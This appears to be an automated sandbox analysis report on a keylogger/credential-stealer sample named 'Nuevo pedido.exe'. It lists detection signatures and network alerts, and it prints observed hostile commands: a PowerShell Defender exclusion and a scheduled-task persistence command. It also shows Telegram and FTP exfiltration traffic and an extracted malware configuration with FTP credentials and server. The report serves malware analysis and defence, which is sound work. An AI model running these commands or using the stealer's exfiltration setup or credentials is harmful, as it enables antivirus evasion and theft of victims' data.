0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e62c:$a1: get_encryptedPassword 0x7284c:$a1: get_encryptedPassword 0xb686c:$a1: get_encryptedPassword 0x2e95b:$a2: get_encryptedUsername 0x72b7b:$a2: get_encryptedUsername 0xb6b9b:$a2: get_encryptedUsername 0x2e43c:$a3: get_timePasswordChanged 0x7265c:$a3: get_timePasswordChanged 0xb667c:$a3: get_timePasswordChanged 0x2e545:$a4: get_passwordField 0x72765:$a4: get_passwordField 0xb6785:$a4: get_passwordField 0x2e642:$a5: set_encryptedPassword 0x72862:$a5: set_encryptedPassword 0xb6882:$a5: set_encryptedPassword 0x2fcf5:$a7: get_logins 0x73f15:$a7: get_logins 0xb7f35:$a7: get_logins 0x2fc58:$a10: KeyLoggerEventArgs 0x73e78:$a10: KeyLoggerEventArgs 0xb7e98:$a10: KeyLoggerEventArgs
0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c540:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x80760:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc4780:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bbe3:$a3: \Google\Chrome\User Data\Default\Login Data 0x7fe03:$a3: \Google\Chrome\User Data\Default\Login Data 0xc3e23:$a3: \Google\Chrome\User Data\Default\Login Data 0x3be40:$a4: \Orbitum\User Data\Default\Login Data 0x80060:$a4: \Orbitum\User Data\Default\Login Data 0xc4080:$a4: \Orbitum\User Data\Default\Login Data 0x3c81f:$a5: \Kometa\User Data\Default\Login Data 0x80a3f:$a5: \Kometa\User Data\Default\Login Data 0xc4a5f:$a5: \Kometa\User Data\Default\Login Data
0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f252:$s1: UnHook 0x73472:$s1: UnHook 0xb7492:$s1: UnHook 0x2f259:$s2: SetHook 0x73479:$s2: SetHook 0xb7499:$s2: SetHook 0x2f261:$s3: CallNextHook 0x73481:$s3: CallNextHook 0xb74a1:$s3: CallNextHook 0x2f26e:$s4: _hook 0x7348e:$s4: _hook 0xb74ae:$s4: _hook
Click to see the 54 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nuevo pedido.exe", ParentImage: C:\Users\user\Desktop\Nuevo pedido.exe, ParentProcessId: 7288, ParentProcessName: Nuevo pedido.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe", ProcessId: 7500, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp69D7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp69D7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe, ParentImage: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe, ParentProcessId: 7900, ParentProcessName: QGVhHsAOjb.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp69D7.tmp", ProcessId: 8072, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Nuevo pedido.exe", ParentImage: C:\Users\user\Desktop\Nuevo pedido.exe, ParentProcessId: 7288, ParentProcessName: Nuevo pedido.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp", ProcessId: 7596, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nuevo pedido.exe", ParentImage: C:\Users\user\Desktop\Nuevo pedido.exe, ParentProcessId: 7288, ParentProcessName: Nuevo pedido.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe", ProcessId: 7500, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Nuevo pedido.exe", ParentImage: C:\Users\user\Desktop\Nuevo pedido.exe, ParentProcessId: 7288, ParentProcessName: Nuevo pedido.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp", ProcessId: 7596, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T16:36:04.683812+0100	2803305	3	Unknown Traffic	192.168.2.4	49737	104.21.16.1	443	TCP
2025-01-09T16:36:07.010759+0100	2803305	3	Unknown Traffic	192.168.2.4	49743	104.21.16.1	443	TCP
2025-01-09T16:36:08.151633+0100	2803305	3	Unknown Traffic	192.168.2.4	49745	104.21.16.1	443	TCP
2025-01-09T16:36:10.374485+0100	2803305	3	Unknown Traffic	192.168.2.4	49753	104.21.16.1	443	TCP
2025-01-09T16:36:11.612850+0100	2803305	3	Unknown Traffic	192.168.2.4	49758	104.21.16.1	443	TCP
2025-01-09T16:36:11.674470+0100	2803305	3	Unknown Traffic	192.168.2.4	49757	104.21.16.1	443	TCP
2025-01-09T16:36:13.987092+0100	2803305	3	Unknown Traffic	192.168.2.4	49766	104.21.16.1	443	TCP
2025-01-09T16:36:16.703376+0100	2803305	3	Unknown Traffic	192.168.2.4	49774	104.21.16.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T16:36:01.743141+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	193.122.130.0	80	TCP
2025-01-09T16:36:04.123149+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	193.122.130.0	80	TCP
2025-01-09T16:36:05.326675+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	193.122.130.0	80	TCP
2025-01-09T16:36:06.336230+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49740	193.122.130.0	80	TCP
2025-01-09T16:36:06.461247+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49741	193.122.130.0	80	TCP
2025-01-09T16:36:07.367481+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49740	193.122.130.0	80	TCP
2025-01-09T16:36:08.679997+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49747	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T16:36:13.730642+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49763	149.154.167.220	443	TCP
2025-01-09T16:36:17.745150+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49775	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://anotherarmy.dns.army:8081	Avira URL Cloud: Label: phishing
Source: http://varders.kozow.com:8081	Avira URL Cloud: Label: malware
Source: http://aborters.duckdns.org:8081	Avira URL Cloud: Label: phishing

Found malware configuration

Source: 14.2.QGVhHsAOjb.exe.400000.0.unpack

Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "somavip@gdmaduanas.com", "Password": "6JLyf]Kt%D5L", "FTP Server": "ftp://50.31.176.103/"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Source: Nuevo pedido.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Nuevo pedido.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Nuevo pedido.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49734 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49742 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49775 version: TLS 1.2

Source: Nuevo pedido.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: btC:\Windows\dll\mscorlib.pdb'w source: QGVhHsAOjb.exe, 0000000E.00000002.4153254455.0000000006AEE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: uindows\hEab.pdbpdbEab.pdb source: QGVhHsAOjb.exe, 0000000E.00000002.4153254455.0000000006AEE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: hEab.pdb source: Nuevo pedido.exe, QGVhHsAOjb.exe.0.dr
Source:	Binary string: hEab.pdbSHA256 source: Nuevo pedido.exe, QGVhHsAOjb.exe.0.dr

Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 4x nop then jmp 02673CA1h	0_2_02673DC0
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 4x nop then jmp 02673CA1h	0_2_026745F9
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-74h]	9_2_02F7F618
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 4x nop then jmp 02F7F45Dh	9_2_02F7F2C0
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 4x nop then jmp 02F7F45Dh	9_2_02F7F4AC
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-74h]	9_2_02F7FA97
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 4x nop then jmp 06D8D1D0h	9_2_06D8CDB8
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 4x nop then jmp 06D84AADh	9_2_06D848D0
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 4x nop then jmp 06D85436h	9_2_06D848D0
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 4x nop then jmp 06D8CC09h	9_2_06D8C958
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_06D84413
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_06D845F3
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 4x nop then jmp 06D8F1F1h	9_2_06D8EF48
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 4x nop then jmp 06D8D1D0h	9_2_06D8CDA8
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 4x nop then jmp 06D8FAA1h	9_2_06D8F7F8
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 4x nop then jmp 06D8F649h	9_2_06D8F3A0
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 4x nop then jmp 06D8D1D0h	9_2_06D8D0FE
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_06D83DCF
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 4x nop then jmp 050E2F21h	10_2_050E3040
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 4x nop then jmp 050E2F21h	10_2_050E3879
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-74h]	14_2_0305F618
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 4x nop then jmp 0305F45Dh	14_2_0305F2C0
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 4x nop then jmp 0305F45Dh	14_2_0305F4AC
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-74h]	14_2_0305FA97

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49775 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49763 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49779 -> 50.31.176.103:32059

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2009/01/2025%20/%2020:22:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2009/01/2025%20/%2020:42:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View

ASN Name: SERVERCENTRALUS SERVERCENTRALUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49747 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49753 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49757 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49758 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49766 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49774 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 104.21.16.1:443

Source: unknown

FTP traffic detected: 50.31.176.103:21 -> 192.168.2.4:49778 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed.220-Local time is now 10:36. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed.220-Local time is now 10:36. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed.220-Local time is now 10:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed.220-Local time is now 10:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49734 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49742 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
